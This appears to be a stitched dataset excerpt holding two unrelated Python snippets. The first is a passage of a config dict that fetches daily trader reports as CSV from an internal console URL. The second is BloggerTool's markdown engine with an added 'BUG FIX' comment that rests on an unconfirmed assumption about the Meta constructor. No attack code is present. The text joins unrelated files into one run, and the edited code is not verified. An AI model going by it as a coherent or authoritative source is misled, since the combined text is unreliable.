            'querytype': 'H',
            'startdate': _yesterday(),
            'enddate': _yesterday()
        },
        "FILE": {
            "FILENAME": "交易商持牌查询_{yesterday}".format(yesterday=_yesterday()),
            "FILETYPE": "csv"
        }
    },
    "customer4": {
        'URL': 'http://console.sxbrme.com:26026/console-shell-m-newreport/reportExcel',
        'SPARE_URL': '',
        'PARAMS': {
            'viewName': 'v_customers_search_his_new',
            'querytype': 'H',
            'startdate': _yesterday(),
            'enddate': _yesterday()
        },
        "FILE": {
            "FILENAME": "交易商成交查询_{yesterday}".format(yesterday=_yesterday()),
            "FILETYPE": "csv"
        }
    },
    "customer5": {
        'URL': 'http://console.sxbrme.com:26026/console-shell-m-newreport/reportExcel',
        'SPARE_URL': '',
        'PARAMS': {
            'viewName': 'v_customerlimprice_search_his',
            'querytype': 'H',
            'startdate': _yesterday(),
            'enddate': _yesterday()
        },
        "FILE": {
            "FILENAME": "交易商订单查询_{yesterday}".format(yesterday=_yesterday()),
            "FILETYPE": "csv"
        }
    },
    "customer6": {
        'URL': 'http://console.sxbrme.com:26026/console-shell-m-newreport/reportExcel',
        'SPARE_URL': '',
        'PARAMS': {
            'viewName': 'v_customerfundflowsybk_new',
            'querytype': 'H',
            'startdate': _yesterday(),
            'enddate': _yesterday()
        },
        "FILE": {
            "FILENAME": "交易商资金流水查询_{yesterday}".format(yesterday=_yesterday()),
            "FILETYPE": "csv"
        }
    },
    "customer7": {
        'URL': 'http://console.sxbrme.com:26026/console-shell-m-newreport/reportExcel',
        'PARAMS': {
            'viewName': 'v_customer_fund_search_ybk_new'
        },
        "FILE": {
            "FILENAME": "交易商资金查询_{yesterday}".format(yesterday=_yesterday()),
            "FILETYPE": "csv"
        }
    },
    "customer8": {
        'URL': 'http://console.sxbrme.com:26026/console-shell-m-newreport/reportExcel',
        'SPARE_URL': '',
        'PARAMS': {
            'viewName': 'v_customerfundflowsybk_new',
            'querytype': 'H',
            'startdate': _yesterday(),
            'enddate': _yesterday()
        },
        "FILE": {
            "FILENAME": "交易商资金状况表_{yesterday}".format(yesterday=_yesterday()),
            "FILETYPE": "csv"
        }
    },
    "customer9": {
        'URL': 'http://console.sxbrme.com:26026/console-shell-m-newreport/reportExcel',
        'SPARE_URL': '',
        'PARAMS': {
            'viewName': 'v_customer_hold_stat_new',
            'startdate': _yesterday(),
            'enddate': _yesterday()
        },
        "FILE": {
            "FILENAME": "交易商持牌汇总表_{yesterday}".format(yesterday=_yesterday()),
            "FILETYPE": "csv"
        }
    },
    "customer10": {
        'URL': 'http://console.sxbrme.com:26026/console-shell-m-newreport/reportExcel',
        'SPARE_URL': '',
        'PARAMS': {
            'viewName': 'v_customer_orders_stat_new',
            'startdate': _yesterday(),
            'enddate': _yesterday()
        },
        "FILE": {
            "FILENAME": "交易商成交汇总表_{yesterday}".format(yesterday=_yesterday()),
            "FILETYPE": "csv"
        }
    }
}
|
# encoding.py
# Copyright (C) 2011-2014 Andrew Svetlov
# andrew.svetlov@gmail.com
#
# This module is part of BloggerTool and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
from __future__ import absolute_import
import markdown
from bloggertool.engine import Meta
class Engine(object):
    """Markdown rendering engine: converts markdown source to inner HTML and
    extracts post metadata (title, slug, labels) from the markdown meta
    block."""

    # Extensions enabled for every conversion.
    MARKDOWN_EXTS = ['abbr',
                     # 'codehilite', # see http://pygments.org/docs/
                     'def_list',
                     'fenced_code',
                     # default at end of html or ///Footnotes Go Here ///
                     'footnotes',
                     # configure via header_level and header_forceid: Off
                     # in md metadata
                     'headerid',
                     'meta',
                     'tables',
                     'toc',  # use [TOC] in md file
                     ]

    def do(self, source):
        """Convert *source* markdown to HTML.

        Returns:
            (inner_html, meta): the rendered HTML fragment and a Meta object
            carrying title/slug/labels parsed from the metadata block.
        """
        md = markdown.Markdown(extensions=self.MARKDOWN_EXTS)
        inner_html = md.convert(source)
        # BUG FIX: the original assigned the Meta CLASS itself (meta = Meta),
        # so every call mutated shared class attributes and all results
        # aliased the same object. Create a fresh instance per conversion.
        # (Assumes Meta() is constructible without arguments — confirm in
        # bloggertool.engine.)
        meta = Meta()
        if 'title' in md.Meta:
            meta.title = ' '.join(md.Meta['title'])
        if 'slug' in md.Meta:
            # A post must carry exactly one slug.
            assert len(md.Meta['slug']) == 1
            slug = md.Meta['slug'][0]
            meta.slug = slug
        if 'labels' in md.Meta:
            # Labels may span multiple metadata lines; normalize to a set.
            labels_str = ', '.join(md.Meta['labels'])
            labels = [l.strip() for l in labels_str.split(',')]
            meta.labels = frozenset(labels)
        return inner_html, meta
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.